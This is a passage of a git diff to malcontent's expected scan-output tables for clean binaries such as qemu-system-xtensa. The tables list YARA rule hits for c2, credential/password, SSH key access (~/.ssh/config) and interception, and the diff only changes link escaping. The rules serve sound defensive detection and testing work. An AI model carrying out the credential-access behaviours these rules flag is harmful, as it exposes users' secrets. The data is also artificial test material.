[zdfRandomTuple3_info](https://github.com/search?q=zdfRandomTuple3_info&type=code)
[zdfRandomTuple4_info](https://github.com/search?q=zdfRandomTuple4_info&type=code)
[zdfRandomTuple5_info](https://github.com/search?q=zdfRandomTuple5_info&type=code)
[zdfRandomTuple6_info](https://github.com/search?q=zdfRandomTuple6_info&type=code)
[zdfRandomTuple7_info](https://github.com/search?q=zdfRandomTuple7_info&type=code)
[zdfRandomTuple7_slow](https://github.com/search?q=zdfRandomTuple7_slow&type=code)
[zdp1MonadRandom_info](https://github.com/search?q=zdp1MonadRandom_info&type=code)
[zdtcDevRandom2_bytes](https://github.com/search?q=zdtcDevRandom2_bytes&type=code)
[zdtcRandomGen3_bytes](https://github.com/search?q=zdtcRandomGen3_bytes&type=code)
[zdwserverRandom_info](https://github.com/search?q=zdwserverRandom_info&type=code)
[CZCMonadRandom_info](https://github.com/search?q=CZCMonadRandom_info&type=code)
[HasPseudoRandomSeed](https://github.com/search?q=HasPseudoRandomSeed&type=code)
[RandomInvertibleMat](https://github.com/search?q=RandomInvertibleMat&type=code)
[RandomUnimodularMat](https://github.com/search?q=RandomUnimodularMat&type=code)
[SCRRandomSubproduct](https://github.com/search?q=SCRRandomSubproduct&type=code)
[SetPseudoRandomSeed](https://github.com/search?q=SetPseudoRandomSeed&type=code)
[curlopt_random_file](https://github.com/search?q=curlopt_random_file&type=code)
[getRandomBytes_info](https://github.com/search?q=getRandomBytes_info&type=code)
[getRandomUUID1_info](https://github.com/search?q=getRandomUUID1_info&type=code)
[getRandomUUID2_info](https://github.com/search?q=getRandomUUID2_info&type=code)
[hrrRandom10_closure](https://github.com/search?q=hrrRandom10_closure&type=code)
[hrrRandom11_closure](https://github.com/search?q=hrrRandom11_closure&type=code)
[hrrRandom12_closure](https://github.com/search?q=hrrRandom12_closure&type=code)
[hrrRandom13_closure](https://github.com/search?q=hrrRandom13_closure&type=code)
[hrrRandom14_closure](https://github.com/search?q=hrrRandom14_closure&type=code)
[hrrRandom15_closure](https://github.com/search?q=hrrRandom15_closure&type=code)
[hrrRandom16_closure](https://github.com/search?q=hrrRandom16_closure&type=code)
[hrrRandom17_closure](https://github.com/search?q=hrrRandom17_closure&type=code)
[hrrRandom18_closure](https://github.com/search?q=hrrRandom18_closure&type=code)
[hrrRandom19_closure](https://github.com/search?q=hrrRandom19_closure&type=code)
[hrrRandom20_closure](https://github.com/search?q=hrrRandom20_closure&type=code)
[hrrRandom21_closure](https://github.com/search?q=hrrRandom21_closure&type=code)
[hrrRandom22_closure](https://github.com/search?q=hrrRandom22_closure&type=code)
[hrrRandom23_closure](https://github.com/search?q=hrrRandom23_closure&type=code)
[hrrRandom24_closure](https://github.com/search?q=hrrRandom24_closure&type=code)
[hrrRandom25_closure](https://github.com/search?q=hrrRandom25_closure&type=code)
[hrrRandom26_closure](https://github.com/search?q=hrrRandom26_closure&type=code)
[hrrRandom27_closure](https://github.com/search?q=hrrRandom27_closure&type=code)
[hrrRandom28_closure](https://github.com/search?q=hrrRandom28_closure&type=code)
[hrrRandom29_closure](https://github.com/search?q=hrrRandom29_closure&type=code)
[hrrRandom30_closure](https://github.com/search?q=hrrRandom30_closure&type=code)
[hrrRandom31_closure](https://github.com/search?q=hrrRandom31_closure&type=code)
[hrrRandom32_closure](https://github.com/search?q=hrrRandom32_closure&type=code)
[hrrRandom33_closure](https://github.com/search?q=hrrRandom33_closure&type=code)
[hrrRandom34_closure](https://github.com/search?q=hrrRandom34_closure&type=code)
[hrrRandom35_closure](https://github.com/search?q=hrrRandom35_closure&type=code)
[hrrRandom36_closure](https://github.com/search?q=hrrRandom36_closure&type=code)
[hrrRandom37_closure](https://github.com/search?q=hrrRandom37_closure&type=code)
[hrrRandom38_closure](https://github.com/search?q=hrrRandom38_closure&type=code)
[hrrRandom39_closure](https://github.com/search?q=hrrRandom39_closure&type=code)
[hrrRandom40_closure](https://github.com/search?q=hrrRandom40_closure&type=code)
[hrrRandom41_closure](https://github.com/search?q=hrrRandom41_closure&type=code)
[hrrRandom42_closure](https://github.com/search?q=hrrRandom42_closure&type=code)
[hrrRandom43_closure](https://github.com/search?q=hrrRandom43_closure&type=code)
[hrrRandom44_closure](https://github.com/search?q=hrrRandom44_closure&type=code)
[hrrRandom45_closure](https://github.com/search?q=hrrRandom45_closure&type=code)
[hrrRandom46_closure](https://github.com/search?q=hrrRandom46_closure&type=code)
[hrrRandom47_closure](https://github.com/search?q=hrrRandom47_closure&type=code)
[hrrRandom48_closure](https://github.com/search?q=hrrRandom48_closure&type=code)
[hrrRandom49_closure](https://github.com/search?q=hrrRandom49_closure&type=code)
[hrrRandom50_closure](https://github.com/search?q=hrrRandom50_closure&type=code)
[hrrRandom51_closure](https://github.com/search?q=hrrRandom51_closure&type=code)
[hrrRandom52_closure](https://github.com/search?q=hrrRandom52_closure&type=code)
[hrrRandom53_closure](https://github.com/search?q=hrrRandom53_closure&type=code)
[hrrRandom54_closure](https://github.com/search?q=hrrRandom54_closure&type=code)
[hrrRandom55_closure](https://github.com/search?q=hrrRandom55_closure&type=code)
[hrrRandom56_closure](https://github.com/search?q=hrrRandom56_closure&type=code)
[hrrRandom57_closure](https://github.com/search?q=hrrRandom57_closure&type=code)
[hrrRandom58_closure](https://github.com/search?q=hrrRandom58_closure&type=code)
[hrrRandom59_closure](https://github.com/search?q=hrrRandom59_closure&type=code)
[hrrRandom60_closure](https://github.com/search?q=hrrRandom60_closure&type=code)
[hrrRandom61_closure](https://github.com/search?q=hrrRandom61_closure&type=code)
[hrrRandom62_closure](https://github.com/search?q=hrrRandom62_closure&type=code)
[zddmrandomR_closure](https://github.com/search?q=zddmrandomR_closure&type=code)
[zddmrandoms_closure](https://github.com/search?q=zddmrandoms_closure&type=code)
[zdfRandomUUID1_info](https://github.com/search?q=zdfRandomUUID1_info&type=code)
[zdfRandomUUID1_slow](https://github.com/search?q=zdfRandomUUID1_slow&type=code)
[zdfRandomUUID2_info](https://github.com/search?q=zdfRandomUUID2_info&type=code)
[zdtcRandom1_closure](https://github.com/search?q=zdtcRandom1_closure&type=code)
[zdtcRandom2_closure](https://github.com/search?q=zdtcRandom2_closure&type=code)
[CZCRandom_con_info](https://github.com/search?q=CZCRandom_con_info&type=code)
[QRandomGenerator64](https://github.com/search?q=QRandomGenerator64&type=code)
[RandomSchreierSims](https://github.com/search?q=RandomSchreierSims&type=code)
[RestoreStateRandom](https://github.com/search?q=RestoreStateRandom&type=code)
[clientRandom1_info](https://github.com/search?q=clientRandom1_info&type=code)
[genRandom1_closure](https://github.com/search?q=genRandom1_closure&type=code)
[genRandom2_closure](https://github.com/search?q=genRandom2_closure&type=code)
[getRandomUUID_info](https://github.com/search?q=getRandomUUID_info&type=code)
[hrrRandom1_closure](https://github.com/search?q=hrrRandom1_closure&type=code)
[hrrRandom2_closure](https://github.com/search?q=hrrRandom2_closure&type=code)
[hrrRandom3_closure](https://github.com/search?q=hrrRandom3_closure&type=code)
[hrrRandom4_closure](https://github.com/search?q=hrrRandom4_closure&type=code)
[hrrRandom5_closure](https://github.com/search?q=hrrRandom5_closure&type=code)
[hrrRandom6_closure](https://github.com/search?q=hrrRandom6_closure&type=code)
[hrrRandom7_closure](https://github.com/search?q=hrrRandom7_closure&type=code)
[hrrRandom8_closure](https://github.com/search?q=hrrRandom8_closure&type=code)
[hrrRandom9_closure](https://github.com/search?q=hrrRandom9_closure&type=code)
[mcrypt_dev_urandom](https://github.com/search?q=mcrypt_dev_urandom&type=code)
[random_f_algorithm](https://github.com/search?q=random_f_algorithm&type=code)
[random_permutation](https://github.com/search?q=random_permutation&type=code)
[serverRandom1_info](https://github.com/search?q=serverRandom1_info&type=code)
[zddmrandom_closure](https://github.com/search?q=zddmrandom_closure&type=code)
[zdtcRandom_closure](https://github.com/search?q=zdtcRandom_closure&type=code)
[CZCRandomGen_info](https://github.com/search?q=CZCRandomGen_info&type=code)
[CZCRandomGen_slow](https://github.com/search?q=CZCRandomGen_slow&type=code)
[CZCRandom_closure](https://github.com/search?q=CZCRandom_closure&type=code)
[RandomPermutation](https://github.com/search?q=RandomPermutation&type=code)
[clientRandom_info](https://github.com/search?q=clientRandom_info&type=code)
[genRandom_closure](https://github.com/search?q=genRandom_closure&type=code)
[getStdRandom_info](https://github.com/search?q=getStdRandom_info&type=code)
[hrrRandom_closure](https://github.com/search?q=hrrRandom_closure&type=code)
[make_random_state](https://github.com/search?q=make_random_state&type=code)
[mcrypt_dev_random](https://github.com/search?q=mcrypt_dev_random&type=code)
[random_tournament](https://github.com/search?q=random_tournament&type=code)
[randompermutation](https://github.com/search?q=randompermutation&type=code)
[zddmrandomRs_info](https://github.com/search?q=zddmrandomRs_info&type=code)
[zdtcRandom3_bytes](https://github.com/search?q=zdtcRandom3_bytes&type=code)
[CloseCryptRandom](https://github.com/search?q=CloseCryptRandom&type=code)
[RandomAccessFile](https://github.com/search?q=RandomAccessFile&type=code)
[closecryptrandom](https://github.com/search?q=closecryptrandom&type=code)
[gmp_random_range](https://github.com/search?q=gmp_random_range&type=code)
[infoClientRandom](https://github.com/search?q=infoClientRandom&type=code)
[infoServerRandom](https://github.com/search?q=infoServerRandom&type=code)
[random_bernoulli](https://github.com/search?q=random_bernoulli&type=code)
[random_geometric](https://github.com/search?q=random_geometric&type=code)
[random_lognormal](https://github.com/search?q=random_lognormal&type=code)
[random_student_t](https://github.com/search?q=random_student_t&type=code)
[set_random_state](https://github.com/search?q=set_random_state&type=code)
[zddmrandomR_info](https://github.com/search?q=zddmrandomR_info&type=code)
[zddmrandoms_info](https://github.com/search?q=zddmrandoms_info&type=code)
[CryptRandomData](https://github.com/search?q=CryptRandomData&type=code)
[OpenCryptRandom](https://github.com/search?q=OpenCryptRandom&type=code)
[RandomElmAsWord](https://github.com/search?q=RandomElmAsWord&type=code)
[SCRRandomString](https://github.com/search?q=SCRRandomString&type=code)
[SecureRandomSpi](https://github.com/search?q=SecureRandomSpi&type=code)
[__gmpz_urandomm](https://github.com/search?q=__gmpz_urandomm&type=code)
[cryptrandomdata](https://github.com/search?q=cryptrandomdata&type=code)
[genRandom1_info](https://github.com/search?q=genRandom1_info&type=code)
[genRandom2_info](https://github.com/search?q=genRandom2_info&type=code)
[gmp_random_bits](https://github.com/search?q=gmp_random_bits&type=code)
[gmp_random_seed](https://github.com/search?q=gmp_random_seed&type=code)
[hrrRandom1_info](https://github.com/search?q=hrrRandom1_info&type=code)
[hstClientRandom](https://github.com/search?q=hstClientRandom&type=code)
[hstServerRandom](https://github.com/search?q=hstServerRandom&type=code)
[math_randomseed](https://github.com/search?q=math_randomseed&type=code)
[opencryptrandom](https://github.com/search?q=opencryptrandom&type=code)
[random_binomial](https://github.com/search?q=random_binomial&type=code)
[random_logistic](https://github.com/search?q=random_logistic&type=code)
[random_rayleigh](https://github.com/search?q=random_rayleigh&type=code)
[RandomizeArray](https://github.com/search?q=RandomizeArray&type=code)
[genRandom_info](https://github.com/search?q=genRandom_info&type=code)
[random_digraph](https://github.com/search?q=random_digraph&type=code)
[random_laplace](https://github.com/search?q=random_laplace&type=code)
[random_network](https://github.com/search?q=random_network&type=code)
[random_poisson](https://github.com/search?q=random_poisson&type=code)
[random_weibull](https://github.com/search?q=random_weibull&type=code)
[randomizearray](https://github.com/search?q=randomizearray&type=code)
[RandomComplex](https://github.com/search?q=RandomComplex&type=code)
[RandomHashKey](https://github.com/search?q=RandomHashKey&type=code)
[RandomVariate](https://github.com/search?q=RandomVariate&type=code)
[RandomizeList](https://github.com/search?q=RandomizeList&type=code)
[SCRRandomPerm](https://github.com/search?q=SCRRandomPerm&type=code)
[SSLRandomSeed](https://github.com/search?q=SSLRandomSeed&type=code)
[random_cauchy](https://github.com/search?q=random_cauchy&type=code)
[random_graph1](https://github.com/search?q=random_graph1&type=code)
[random_gumbel](https://github.com/search?q=random_gumbel&type=code)
[random_normal](https://github.com/search?q=random_normal&type=code)
[random_number](https://github.com/search?q=random_number&type=code)
[random_pareto](https://github.com/search?q=random_pareto&type=code)
[randomcomplex](https://github.com/search?q=randomcomplex&type=code)
[randominteger](https://github.com/search?q=randominteger&type=code)
[randomizelist](https://github.com/search?q=randomizelist&type=code)
[randomvariate](https://github.com/search?q=randomvariate&type=code)
[skf_ad_random](https://github.com/search?q=skf_ad_random&type=code)
[sslrandomseed](https://github.com/search?q=sslrandomseed&type=code)
[RandomChoice](https://github.com/search?q=RandomChoice&type=code)
[RandomDevice](https://github.com/search?q=RandomDevice&type=code)
[RandomSample](https://github.com/search?q=RandomSample&type=code)
[RandomSource](https://github.com/search?q=RandomSource&type=code)
[StatusRandom](https://github.com/search?q=StatusRandom&type=code)
[random_bytes](https://github.com/search?q=random_bytes&type=code)
[randomchoice](https://github.com/search?q=randomchoice&type=code)
[randomsample](https://github.com/search?q=randomsample&type=code)
[BlockRandom](https://github.com/search?q=BlockRandom&type=code)
[RandomByPcs](https://github.com/search?q=RandomByPcs&type=code)
[RandomGraph](https://github.com/search?q=RandomGraph&type=code)
[RandomImage](https://github.com/search?q=RandomImage&type=code)
[RandomPrime](https://github.com/search?q=RandomPrime&type=code)
[blockrandom](https://github.com/search?q=blockrandom&type=code)
[random_tree](https://github.com/search?q=random_tree&type=code)
[randomgraph](https://github.com/search?q=randomgraph&type=code)
[randomimage](https://github.com/search?q=randomimage&type=code)
[randomprime](https://github.com/search?q=randomprime&type=code)
[RandomList](https://github.com/search?q=RandomList&type=code)
[RandomReal](https://github.com/search?q=RandomReal&type=code)
[Randomizer](https://github.com/search?q=Randomizer&type=code)
[Randomizes](https://github.com/search?q=Randomizes&type=code)
[SeedRandom](https://github.com/search?q=SeedRandom&type=code)
[random_int](https://github.com/search?q=random_int&type=code)
[randomizer](https://github.com/search?q=randomizer&type=code)
[randomreal](https://github.com/search?q=randomreal&type=code)
[seedrandom](https://github.com/search?q=seedrandom&type=code)
[RandomMat](https://github.com/search?q=RandomMat&type=code)
[RandomPol](https://github.com/search?q=RandomPol&type=code)
[lHSrandom](https://github.com/search?q=lHSrandom&type=code)
[randomly](https://github.com/search?q=randomly&type=code) | | LOW | [anti-static/obfuscation/obfuscate](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/obfuscate.yara#obfuscate) | Mentions the word obfuscate | [obfuscatedFont](https://github.com/search?q=obfuscatedFont&type=code)
[obfuscates](https://github.com/search?q=obfuscates&type=code) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code)
[amd64](https://github.com/search?q=amd64&type=code) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[x86_64](https://github.com/search?q=x86_64&type=code)
[amd64](https://github.com/search?q=amd64&type=code) | | LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ldap_control_passwordpolicyresponse](https://github.com/search?q=ldap_control_passwordpolicyresponse&type=code)
[ADFineGrainedPasswordPolicySubject](https://github.com/search?q=ADFineGrainedPasswordPolicySubject&type=code)
[adfinegrainedpasswordpolicysubject](https://github.com/search?q=adfinegrainedpasswordpolicysubject&type=code)
[ldap_control_passwordpolicyrequest](https://github.com/search?q=ldap_control_passwordpolicyrequest&type=code)
[curle_ftp_user_password_incorrect](https://github.com/search?q=curle_ftp_user_password_incorrect&type=code)
[ADDefaultDomainPasswordPolicy](https://github.com/search?q=ADDefaultDomainPasswordPolicy&type=code)
[ADUserResultantPasswordPolicy](https://github.com/search?q=ADUserResultantPasswordPolicy&type=code)
[addefaultdomainpasswordpolicy](https://github.com/search?q=addefaultdomainpasswordpolicy&type=code)
[aduserresultantpasswordpolicy](https://github.com/search?q=aduserresultantpasswordpolicy&type=code)
[curle_bad_password_entered](https://github.com/search?q=curle_bad_password_entered&type=code)
[zdtczqBadPassword_closure](https://github.com/search?q=zdtczqBadPassword_closure&type=code)
[ADServiceAccountPassword](https://github.com/search?q=ADServiceAccountPassword&type=code)
[adserviceaccountpassword](https://github.com/search?q=adserviceaccountpassword&type=code)
[password_verify_function](https://github.com/search?q=password_verify_function&type=code)
[ComputerMachinePassword](https://github.com/search?q=ComputerMachinePassword&type=code)
[computermachinepassword](https://github.com/search?q=computermachinepassword&type=code)
[fbsql_database_password](https://github.com/search?q=fbsql_database_password&type=code)
[PasswordAuthentication](https://github.com/search?q=PasswordAuthentication&type=code)
[param_default_password](https://github.com/search?q=param_default_password&type=code)
[proxy_tlsauth_password](https://github.com/search?q=proxy_tlsauth_password&type=code)
[Set-ADAccountPassword](https://github.com/search?q=Set-ADAccountPassword&type=code)
[curlssh_auth_password](https://github.com/search?q=curlssh_auth_password&type=code)
[password_needs_rehash](https://github.com/search?q=password_needs_rehash&type=code)
[set-adaccountpassword](https://github.com/search?q=set-adaccountpassword&type=code)
[swftextfield_password](https://github.com/search?q=swftextfield_password&type=code)
[AuthLDAPBindPassword](https://github.com/search?q=AuthLDAPBindPassword&type=code)
[BadPassword_con_info](https://github.com/search?q=BadPassword_con_info&type=code)
[BasicPasswordFieldUI](https://github.com/search?q=BasicPasswordFieldUI&type=code)
[authldapbindpassword](https://github.com/search?q=authldapbindpassword&type=code)
[dont_store_passwords](https://github.com/search?q=dont_store_passwords&type=code)
[radius_chap_password](https://github.com/search?q=radius_chap_password&type=code)
[radius_user_password](https://github.com/search?q=radius_user_password&type=code)
[oci_password_change](https://github.com/search?q=oci_password_change&type=code)
[password_grace_time](https://github.com/search?q=password_grace_time&type=code)
[password_reuse_time](https://github.com/search?q=password_reuse_time&type=code)
[PasswordCredential](https://github.com/search?q=PasswordCredential&type=code)
[PasswordProtection](https://github.com/search?q=PasswordProtection&type=code)
[fbsql_set_password](https://github.com/search?q=fbsql_set_password&type=code)
[init_with_password](https://github.com/search?q=init_with_password&type=code)
[newt_flag_password](https://github.com/search?q=newt_flag_password&type=code)
[password for entry](https://github.com/search?q=password+for+entry&type=code)
[password_field_tag](https://github.com/search?q=password_field_tag&type=code)
[password_life_time](https://github.com/search?q=password_life_time&type=code)
[password_lock_time](https://github.com/search?q=password_lock_time&type=code)
[password_reuse_max](https://github.com/search?q=password_reuse_max&type=code)
[password_get_info](https://github.com/search?q=password_get_info&type=code)
[PasswordCallback](https://github.com/search?q=PasswordCallback&type=code)
[password_default](https://github.com/search?q=password_default&type=code)
[password_bcrypt](https://github.com/search?q=password_bcrypt&type=code)
[JPasswordField](https://github.com/search?q=JPasswordField&type=code)
[fbsql_password](https://github.com/search?q=fbsql_password&type=code)
[groupPassword](https://github.com/search?q=groupPassword&type=code)
[password_hash](https://github.com/search?q=password_hash&type=code)
[PasswordView](https://github.com/search?q=PasswordView&type=code)
[sam_password](https://github.com/search?q=sam_password&type=code)
[userPassword](https://github.com/search?q=userPassword&type=code) | | LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [PRIVATE_KEY](https://github.com/search?q=PRIVATE_KEY&type=code)
[private_key](https://github.com/search?q=private_key&type=code)
[privatekey](https://github.com/search?q=privatekey&type=code) | | LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [aes_256_cbc](https://github.com/search?q=aes_256_cbc&type=code)
[aes_encrypt](https://github.com/search?q=aes_encrypt&type=code)
[AES](https://github.com/search?q=AES&type=code) | diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md index cb7bfa819..03209adac 100644 --- a/tests/linux/clean/qemu-system-xtensa.md +++ b/tests/linux/clean/qemu-system-xtensa.md @@ -5,7 +5,7 @@ | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [register_port](https://github.com/search?q=register_port&type=code)
[throttle_port](https://github.com/search?q=throttle_port&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https%3A%2F%2F)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http%3A%2F%2F)
[windows](https://github.com/search?q=windows&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | | MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) | | MEDIUM | [crypto/cipher](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/cipher.yara#ciphertext) | mentions 'ciphertext' | [ciphertext](https://github.com/search?q=ciphertext&type=code) | @@ -35,7 +35,7 @@ | MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | -| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | [host=addr,local.port](https://github.com/search?q=host%3Daddr%2Clocal.port&type=code)
[host=host],port=port](https://github.com/search?q=host%3Dhost%5D%2Cport%3Dport&type=code)
[host is not support](https://github.com/search?q=host+is+not+support&type=code)
[host,addr.port=port](https://github.com/search?q=host%2Caddr.port%3Dport&type=code)
[host=host,addr.port](https://github.com/search?q=host%3Dhost%2Caddr.port&type=code)
[hostaddr]:hostport](https://github.com/search?q=hostaddr%5D%3Ahostport&type=code)
[host_user.support](https://github.com/search?q=host_user.support&type=code)
[host_user_support](https://github.com/search?q=host_user_support&type=code)
[host and/or port](https://github.com/search?q=host+and%2For+port&type=code)
[hostname:s,port](https://github.com/search?q=hostname%3As%2Cport&type=code)
[host from port](https://github.com/search?q=host+from+port&type=code)
[host transport](https://github.com/search?q=host+transport&type=code)
[host and port](https://github.com/search?q=host+and+port&type=code)
[host_get_port](https://github.com/search?q=host_get_port&type=code)
[hostname port](https://github.com/search?q=hostname+port&type=code)
[host_support](https://github.com/search?q=host_support&type=code)
`$host_port`
[host]:port](https://github.com/search?q=host%5D%3Aport&type=code)
[host port](https://github.com/search?q=host+port&type=code)
[host/port](https://github.com/search?q=host%2Fport&type=code)
[host:port](https://github.com/search?q=host%3Aport&type=code) | +| MEDIUM | [net/ip/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/host_port.yara#host_port_ref) | connects to an arbitrary hostname:port | [host=addr,local.port](https://github.com/search?q=host%3Daddr%2Clocal.port&type=code)
[host=host\],port=port](https://github.com/search?q=host%3Dhost%5D%2Cport%3Dport&type=code)
[host is not support](https://github.com/search?q=host+is+not+support&type=code)
[host,addr.port=port](https://github.com/search?q=host%2Caddr.port%3Dport&type=code)
[host=host,addr.port](https://github.com/search?q=host%3Dhost%2Caddr.port&type=code)
[hostaddr\]:hostport](https://github.com/search?q=hostaddr%5D%3Ahostport&type=code)
[host_user.support](https://github.com/search?q=host_user.support&type=code)
[host_user_support](https://github.com/search?q=host_user_support&type=code)
[host and/or port](https://github.com/search?q=host+and%2For+port&type=code)
[hostname:s,port](https://github.com/search?q=hostname%3As%2Cport&type=code)
[host from port](https://github.com/search?q=host+from+port&type=code)
[host transport](https://github.com/search?q=host+transport&type=code)
[host and port](https://github.com/search?q=host+and+port&type=code)
[host_get_port](https://github.com/search?q=host_get_port&type=code)
[hostname port](https://github.com/search?q=hostname+port&type=code)
[host_support](https://github.com/search?q=host_support&type=code)
`$host_port`
[host\]:port](https://github.com/search?q=host%5D%3Aport&type=code)
[host port](https://github.com/search?q=host+port&type=code)
[host/port](https://github.com/search?q=host%2Fport&type=code)
[host:port](https://github.com/search?q=host%3Aport&type=code) | | MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping 0x](https://github.com/search?q=ping+0x&type=code) | | MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | | MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code) | @@ -53,8 +53,8 @@ | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept_gpio_out](https://github.com/search?q=intercept_gpio_out&type=code)
[intercept_dev](https://github.com/search?q=intercept_dev&type=code)
[intercept_out](https://github.com/search?q=intercept_out&type=code)
[intercept_in](https://github.com/search?q=intercept_in&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | | LOW | [anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random) | uses a random number generator | [visit_type_RngRandomProperties](https://github.com/search?q=visit_type_RngRandomProperties&type=code)
[qapi_free_RngRandomProperties](https://github.com/search?q=qapi_free_RngRandomProperties&type=code)
[qemu_guest_getrandom_nofail](https://github.com/search?q=qemu_guest_getrandom_nofail&type=code)
